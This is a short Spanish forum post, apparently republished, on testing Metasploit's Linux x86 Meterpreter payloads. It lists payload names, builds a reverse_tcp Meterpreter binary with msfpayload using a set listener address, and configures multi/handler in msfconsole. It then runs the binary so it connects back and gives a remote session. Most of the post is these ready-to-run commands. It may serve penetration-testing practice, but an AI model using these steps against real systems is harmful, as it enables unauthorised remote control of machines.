Código: Seleccionar todo
linux/x86/meterpreter/bind_ipv6_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/meterpreter/reverse_ipv6_tcp
linux/x86/meterpreter/reverse_tcp
linux/x86/metsvc_bind_tcp
linux/x86/metsvc_reverse_tcp
Pegándole un ojo a los créditos del payload, vemos la siguiente descripción:

Para probarla creamos un binario para no tener que explotar la vulnerabilidad cada prueva que queremos hacer, eso lo hacemos con el comando msfpayload
Código: Seleccionar todo
# cd /opt/metasploit3/msf3
# ./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=172.16.24.150 X> /tmp/meterlin.bin
Para usar el multi/handler (módulo al que le especificas el payload y sirve para poder recoger las conexiones, tanto directas como inversas, de los diferentes payloads de Metasploit):
Código: Seleccionar todo
# ./msfconsole
msf > use multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.24.150
msf exploit(handler) > exploit
Por ultimo lanzamos el binario generado previamente para que realice la conexión inversa hasta el multi/handler que he lanzado en Metasploit:
Código: Seleccionar todo
# cd /tmp
# ./meterlin.bin
Y vemos los mensajes a los que estamos acostumbrados:

Fuente: DDLR